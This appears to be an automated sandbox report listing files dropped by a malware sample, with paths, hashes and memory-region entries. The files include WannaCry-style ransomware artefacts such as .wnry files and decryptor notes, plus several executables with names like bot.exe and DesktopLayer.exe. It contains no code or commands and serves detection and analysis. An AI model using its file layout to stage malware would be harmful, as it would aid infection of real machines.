SHA512 af8b4e7761384425947c8390f59344683312ab4ab46338473aec4b963556e7e987e51ade67b3d09de9638b834d1be7b2a2b5ea3a55d8f4e04b37e26fec6342d5

C:\Users\Admin\AppData\Local\Temp\9888.tmp\9889.tmp\988A.bat

MD5 76688da2afa9352238f6016e6be4cb97
SHA1 36fd1260f078209c83e49e7daaee3a635167a60f
SHA256 e365685ea938b12790a195383434d825f46c41c80469ce11b9765305780bff7a
SHA512 34659bf4de5c2cbd7cdc7309a48880ac2e1f19e0a4da0c1d4cc45658a81f9f4e7a9293be48e853de812a6b94e1caa3356a715a1a0c14d37b7ae99ba5888bd1df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 ce2e8cfda15cdc71bdd972b8eb6a3e9e
SHA1 1df20c358ddc1fe676b1d8f3167cf0bbf2883216
SHA256 a0a780c0859b63c94cad19aedfc4d50f6c62cc1fc6fc47bd6e165db1ffda9136
SHA512 0772829545a395b561059bc4fca76231aec756353d41e532c478d640f8e422bffdadf9fd3c1296e0859b5d2df9c42d6c899b6dfd709619e2c9489f34a890b6ed

\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 e76e0a32f6a995c94fab6d63afd11302
SHA1 84edbb84e2c9018978aeb3e7df86349bd01b2a12
SHA256 913ad150a2d2d7a3dc276ffa9e0d8eefa3e0a45a3898a0a9d05f2268604ccd64
SHA512 d49626d78f81e3ef8c611a55fac6885edce019e23aa2d37840d8af36bcb5d9a792914ffb950c599df2dc9385d6199a5e4a42f8407f2f620d1b914cec0db38d1a

C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp

MD5 bd99738beebe3d176e3f24d6963d318e
SHA1 616baa00c34a563f81a14840997dc21c991cb5d2
SHA256 3e5615e0a91ada0c3149cc45db8e45bab5b96b46ce0c777877ad05532eed3401
SHA512 ee381911b3d2901525a413a9473d456c64c851a8240559db10f00e0450e707c17eb409cefcb23dd79be4f576c35832f9197f6a7a95fee577428bffd01264b27b

\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp

MD5 37238b51e5978e66be55f51839bfb6b8
SHA1 c71bd2906f53dad8e098bef393b3653a2e40a635
SHA256 e749c6e62610ff4614c25e47d0ac4f1513f0e46693eabae2532a289018b2aea1
SHA512 915862801fac72a836112e4db75df4b61bb57d863c1ae26bb1bf4c79736d7ba2b2d9c4d6eb370e103ec5cc775c47f98548d2ae9b0840ddf80c242079a5b9158d

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 cee33c0e5ab3180a6f2ead72402552d5
SHA1 1387f91e5382536e8d04cfd195153e4c1e5281fa
SHA256 817ef5c5f94e42f2081dc96c41fd2d0ad2b810f0fe7499495c106be0751499d4
SHA512 f6bbeae3ede2dc4f9f7fe8cdbe5da7435a96239ca7079ca108217c1a3534f22365a7e6d504a174694fc1f7e01fcb88b51808508a14107436d943d81b4ea35f17

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry

MD5 fa948f7d8dfb21ceddd6794f2d56b44f
SHA1 ca915fbe020caa88dd776d89632d7866f660fc7a
SHA256 bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66
SHA512 0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry

MD5 e79d7f2833a9c2e2553c7fe04a1b63f4
SHA1 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
SHA256 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
SHA512 e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

memory/616-182-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry

MD5 ff70cc7c00951084175d12128ce02399
SHA1 75ad3b1ad4fb14813882d88e952208c648f1fd18
SHA256 cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a
SHA512 f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry

MD5 c33afb4ecc04ee1bcc6975bea49abe40
SHA1 fbea4f170507cde02b839527ef50b7ec74b4821f
SHA256 a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536
SHA512 0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry

MD5 6735cb43fe44832b061eeb3f5956b099
SHA1 d636daf64d524f81367ea92fdafa3726c909bee1
SHA256 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0
SHA512 60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry

MD5 b77e1221f7ecd0b5d696cb66cda1609e
SHA1 51eb7a254a33d05edf188ded653005dc82de8a46
SHA256 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e
SHA512 f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry

MD5 30a200f78498990095b36f574b6e8690
SHA1 c4b1b3c087bd12b063e98bca464cd05f3f7b7882
SHA256 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07
SHA512 c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry

MD5 3788f91c694dfc48e12417ce93356b0f
SHA1 eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
SHA256 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4
SHA512 b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry

MD5 fb4e8718fea95bb7479727fde80cb424
SHA1 1088c7653cba385fe994e9ae34a6595898f20aeb
SHA256 e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9
SHA512 24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry

MD5 3d59bbb5553fe03a89f817819540f469
SHA1 26781d4b06ff704800b463d0f1fca3afd923a9fe
SHA256 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61
SHA512 95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry

MD5 4e57113a6bf6b88fdd32782a4a381274
SHA1 0fccbc91f0f94453d91670c6794f71348711061d
SHA256 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc
SHA512 4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry

MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry

MD5 fe68c2dc0d2419b38f44d83f2fcf232e
SHA1 6c6e49949957215aa2f3dfb72207d249adf36283
SHA256 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5
SHA512 941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry

MD5 7a8d499407c6a647c03c4471a67eaad7
SHA1 d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
SHA256 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c
SHA512 608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry

MD5 2c5a3b81d5c4715b7bea01033367fcb5
SHA1 b548b45da8463e17199daafd34c23591f94e82cd
SHA256 a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6
SHA512 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry

MD5 537efeecdfa94cc421e58fd82a58ba9e
SHA1 3609456e16bc16ba447979f3aa69221290ec17d0
SHA256 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150
SHA512 e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry

MD5 17194003fa70ce477326ce2f6deeb270
SHA1 e325988f68d327743926ea317abb9882f347fa73
SHA256 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171
SHA512 dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry

MD5 2efc3690d67cd073a9406a25005f7cea
SHA1 52c07f98870eabace6ec370b7eb562751e8067e9
SHA256 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a
SHA512 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (simplified).wnry

MD5 0252d45ca21c8e43c9742285c48e91ad
SHA1 5c14551d2736eef3a1c1970cc492206e531703c1
SHA256 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a
SHA512 1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

MD5 95673b0f968c0f55b32204361940d184
SHA1 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
SHA256 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd
SHA512 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

MD5 93f33b83f1f263e2419006d6026e7bc1
SHA1 1a4b36c56430a56af2e0ecabd754bf00067ce488
SHA256 ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4
SHA512 45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

MD5 6cb51b847e4d951cdc314da5cd5e242c
SHA1 56add4d5feebff15b739ec2bb86c69c48045c75b
SHA256 b8a1a6efb0d444c1093aed700fba1f43229b68b178a729fd4e65a40ee7eb4181
SHA512 432ee6c076bfbf07788dc9c0e73804758e4e7df0449090057e32e1a2a081d7ae9cad302d83adfa23e56394d95be689182ffaa1f67fddd504336b647fd25b8179

memory/1252-88-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1600-198-0x00000000712F0000-0x000000007189B000-memory.dmp

memory/1600-199-0x0000000000510000-0x0000000000550000-memory.dmp

memory/276-201-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2092-202-0x00000000002C0000-0x00000000002F1000-memory.dmp

memory/340-204-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/300-203-0x0000000004900000-0x0000000004940000-memory.dmp

memory/1600-200-0x00000000712F0000-0x000000007189B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 9ba17a600e6d43d81c098c4068f193d0
SHA1 794a7ee1fc198becb6f90f40513599957094dab7
SHA256 bc3d6f438a7a9584b328fb5a02e81b471dc859e88b233dd284378142cfc6221b
SHA512 c2cde8c0ffc670b47ca454e1f23ed6bf65d1435e4db753083acceed378c3a60ac22d2b71f4b3f14709480ba0ae8703c6b075ac6d6ff922bfc05d02dbccae9136

C:\Users\Admin\Desktop\1.exe

MD5 69a5fc20b7864e6cf84d0383779877a5
SHA1 6c31649e2dc18a9432b19e52ce7bf2014959be88
SHA256 4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2
SHA512 f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 226bb000422e9016c3c02858b9fa2d57
SHA1 bf756e80c0125ef10504d7ad0a71b7dbfb22885b
SHA256 c7d9a343d1a36210b9e24b5dc3616f0326c3be77b7a7c3d5bfef9248b605408b
SHA512 1eb4028546ed44a8ddce5433f79e057f530048107af141f764c85f53033607b94f8e60f71e6d55b4a0ffe9b4ab0ec2b55ca343d44d12b55349ed4c5626895e25

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 4c70de684f344601b06057ac7ee4c3fc
SHA1 85e218225c0d76cd6f34d2b940cba5542ff4e52c
SHA256 f9d63bc019586652a1ad5e29799de18108c9f80e087e8ca85e66dc52c2349b00
SHA512 bba5b96330050bd07e6c68167e30d9a4bf0c00a0e5330db5fb6d92d28737fa15b757628a3c699e7ef680543312753581aba69c9f2dc7c0d33f363c0b2be5ef9a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 2daba6e3a57e176d4c6ea1a5781ff213
SHA1 1a1b6ea8c82316f5c7e16079ec60ed1eda346d46
SHA256 54ecdc0e41b738f6789be4f446ac447e943066e66ca3759495bbf621f52d85d5
SHA512 39c0cfe07a5df1a437c5a2b40dd03b07d95d28a0c619ffccc9a1f3b932beeecf5f5da177d4f92b78a403092ace4604e0d3f8be5da29823f829619ef96f56fcf5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 1500865b1f09b32e591587fe75fd4a1e
SHA1 09ea725db9db44f57288b4ce41d80cd09583ba7e
SHA256 5cd26225443d4363ae530d63b6e135c6e33cf1c84279944cfa4cd29eddb2976f
SHA512 fd4b104ce90d8f05bebaedbcdbc8025a3c9007e1553e45456b7f6960d245f6e7f4c0591aeadfad0e4dcbccb8f11c21438125f045e319eed98b383e28f17930ea

\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 1838c6cc706f07878bea8713139c4ae1
SHA1 197849bd7af2df2e47f510f6d8aa5cdcfa3cc30b
SHA256 33bb991ff7ff1661d11a97e0d7309cb20ce2937f8f6bd0d0fb88051a443c98a4
SHA512 c33b718939ac0b7e404400812e86e0e8e8c8ac2a0a93f6f045e1fd89d39905ba21efcd8eb75df4c16bfb36c43d41ae7cbcf9cdc837418218b2fde4f6f7f789e4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/2152-205-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\Desktop\10.exe

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

memory/276-211-0x0000000000400000-0x000000000068E000-memory.dmp

memory/2152-212-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1972-217-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/2152-236-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\107481704838965.bat

MD5 56bda98548d75c62da1cff4b1671655b
SHA1 90a0c4123b86ac28da829e645cb171db00cf65dc
SHA256 35e5885504a1745554c26f49a0adab2d26a532838f8e495f211572d42ea19ead
SHA512 eefeab1311ded740628cf3fed32e750266dd2daa833ab8212f8ffe548967f0bd94e48cf11c75345150885268404c0275aab56b4210fb4f21883046611a567a72

memory/276-294-0x0000000000400000-0x000000000068E000-memory.dmp

memory/1972-299-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/2152-302-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1972-313-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/276-312-0x0000000000400000-0x000000000068E000-memory.dmp

memory/1368-326-0x0000000000400000-0x0000000000705000-memory.dmp

memory/2152-329-0x0000000000400000-0x000000000041B000-memory.dmp

memory/276-333-0x0000000000400000-0x000000000068E000-memory.dmp

memory/2092-336-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2152-339-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCB1E.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarDDD6.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

memory/2152-389-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1368-410-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2152-427-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\Desktop\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

memory/1368-442-0x0000000000400000-0x0000000000705000-memory.dmp

memory/1252-443-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/300-444-0x0000000072C30000-0x000000007331E000-memory.dmp

memory/2092-445-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1600-446-0x00000000712F0000-0x000000007189B000-memory.dmp

memory/2152-447-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1600-453-0x0000000000510000-0x0000000000550000-memory.dmp

memory/1600-454-0x00000000712F0000-0x000000007189B000-memory.dmp

memory/276-455-0x0000000000240000-0x0000000000241000-memory.dmp

memory/300-458-0x0000000004900000-0x0000000004940000-memory.dmp

memory/1600-461-0x0000000000510000-0x0000000000550000-memory.dmp

memory/1368-464-0x0000000000260000-0x0000000000261000-memory.dmp

memory/2152-469-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2324-481-0x000000002F861000-0x000000002F862000-memory.dmp

memory/2092-482-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2324-504-0x000000006846D000-0x0000000068478000-memory.dmp

memory/1600-505-0x0000000000510000-0x0000000000550000-memory.dmp

memory/1600-506-0x0000000000510000-0x0000000000550000-memory.dmp

C:\SpLiTTer.Exe

MD5 cb960c030f900b11e9025afea74f3c0c
SHA1 bbdcad9527c814a9e92cdc1ee27ae9db931eb527
SHA256 91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99
SHA512 9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 10a843c65f207587f0f585bf835bcfba
SHA1 90b5e48061dcb0c71e70df7f0c1048fe12f2c936
SHA256 c23b83cc28662b53df9340b57a06048ac22b28e628376561448061317bf3224c
SHA512 b693ef0339e4c20b4c5f80ed97efefe927db48317622d4a2619d80c0c96ec32c1e9d40df2b1a5cf4e607370603b4dae3ee71b713fa8cc7991938e85963942a05

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c6d3f9f66ce8c93b5eb740ac7a368594
SHA1 a201ef09c4e8de35386b6ca545145aff992937ab
SHA256 c9a97b2dd8d7bd2472fcaeba23cb8f2631e253e8fe169374e8caaffd3e3421f7
SHA512 583d8acb79f9d61fc19bcbdbd76739975bba063826045aefc6fbf38a8fe3755c8d28e77af744108cd2ac9926ca1b64dfd05dc5177ec298d82d89b1a972adcff6

memory/1600-816-0x0000000000510000-0x0000000000550000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cbbf4632855953ac7c5530fed5bf2ca8
SHA1 b082a1330fd1358175652257a96011f6f9e3769e
SHA256 77366c3d84329ac3c7b15835c70e61be9bdf10eb40f64db7fd2b7a53c53e91f2
SHA512 55fe1020be2745a25ea61fb1aaae1b4bd9d6e33d80824b6858cd1948138177dcd65fa6de2efe7559d79259c2d4a5a0a447dcab2f2f0dbbe0dbb83d7597548bee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 46ec386e7b9cf8a3a89995af16306118
SHA1 6ebab03a3b5095e168515a375846e3f83c44e3cf
SHA256 74ad128e6c95f77ff1a6d45327495b7279d656e0dc4f2f9e3ce71044af0373f0
SHA512 4548c09ba8756d8fe8e1b4f2281f5149bf21f5b4bb9274484e16b10400a1ec449949845217be716048b0eb882ceaa72abcfc4670dceef673231509562833d5ed

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c88eebfd1667bdba9d5f974b54072ec
SHA1 27afcf4a485b57b7e9f029899b3c28b36d714e2d
SHA256 97bcd74e240eb37ff0a111f34e9a78291e57f1418f2cf2e5357ea78b3bdf6b3e
SHA512 042caf1799fcb958f3649f0db319db9f191df1b2d2c9139f77091763270f256c15fd67cbc6b1226510ffb9e66c4a6b19948c6f445e485888e57bf74a3d86659b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b1bf65ffd7acd1dde8e9be73e6588360
SHA1 0e279a26eb0db3840ebfaba29ab1fb3f75f4f72e
SHA256 58ad02a77dd205e58787e0167718b9aab8d56304e2ec230ec49fc0d9551cf470
SHA512 5269b6a084cc8876ea2e1fedc2b99a89094cd4b7d568712d2bd5a550c36dd3bf779ebb8fe2a82a40ec08122376296a7120c2fe436e64059319cbb797801f2fb0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d04bbe20a50511d516feca0d6bba061
SHA1 2e41d3740b59ceeb701c9054d89ac945ed5f4609
SHA256 db276b9a2c61571cb300c7d1bd4f9ccd45e3a7fa8e9e279e543f99055cb800aa
SHA512 8033ec8b7d723c3b684b280a78252f4cfb57795c253ad60ab8cde6fa04bfb0b24208ede82c9dd261cb0348db502b553216315f91caa5491090aac82a89b12e00

memory/2656-1148-0x000000006846D000-0x0000000068478000-memory.dmp

memory/2092-1246-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\Documents\@[email protected]

MD5 7e6b6da7c61fcb66f3f30166871def5b
SHA1 00f699cf9bbc0308f6e101283eca15a7c566d4f9
SHA256 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e
SHA512 e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

C:\Windows\directx.sys

MD5 04e857b9e9b719deb8431c056bd36980
SHA1 794bee1fbbedfbde3c2b22b9523cc8be5a34dead
SHA256 02f8a809d260576eb6fd56d16553b2d394a7827c284d5f947a9e617025f72a1e
SHA512 b67bc1ecb2218d00060e7d02aa01e54830e58c4efbe7fb0ac1336da177b270b2421625c7e0f5e3c73e5f74db03e44caacbb19d49d709d30b1e12164bcc83ba63

C:\Windows\directx.sys

MD5 e08da1f05efb3b6d438640a92d92761c
SHA1 cd8f9ad002181ebf87a3625734498ddc4a50ec59
SHA256 b981c91e4a64e872ae4c83dc193e4a5b3007a36f2b9e24b065aae6105ebd8a52
SHA512 e4c128d705de71ab84d99894deba6e52b01a22d95186008febdffab21084ae3f4ea601bf610a4f94c717f68f00eb177a20b4008c91227671b7b08548a6b1067d

memory/2880-1465-0x0000000000D50000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Local\TEMPEX~1.EXE

MD5 a4d60b143b5fcc68f86b929d73d1880d
SHA1 36e946b7d6dd02542e1d893abaa448aff43f1072
SHA256 7a55183d372c4645e8a31389d2813fa12c127389254b7412c225ec413c404044
SHA512 dd9562c3b9d4198d322f7db0d16b4dcdbf6abc6474faf4ed25f1bca88c69614c8dbaf4e51de61c208a7f9c261de3e6f1f530f245640d1315ee22b3b0642945ff

C:\Windows\directx.sys

MD5 f59242b83b85879711e7a8314958ca97
SHA1 2e8b8ef476a2c14991b1e04fc2fe8adc5cbfabdb
SHA256 5891dc17d4f47efa1bf3bcadfc07f152c2ed6a331918a1a3e5c3565a6a18ff92
SHA512 5ee8f089b23b3b635c3ff17b1c7baf0102f8d5072e1942f5a60946958017783b8b0f6af8cc7c8838f2e77cdfbc8d820b7d27214bdfbf94b6b720bcfa91e6cc40

memory/2020-1476-0x0000000000ED0000-0x0000000001404000-memory.dmp

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\@[email protected]

MD5 ead26e9ffec1e503914045b35971e09a
SHA1 c607f6fc0c232f82941405eea8fcb94035bc1d67
SHA256 5fab33f4bd6b7c0410c82679b11c615d1719978b7ed3a8f589a28acc9b209e2d
SHA512 f5482bbc8d01eb53988ee1f84b0a995373294b036190175e54f18dda070fba04b4138272d7ec7b1f2e919824eaad931a4d1b540c4389f03bde3ccadbdddf5c47

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

MD5 47826f2614f1fa90601dc51e40d5c29e
SHA1 e9673510f232869a91280e4c2941f8aa2f8c5108
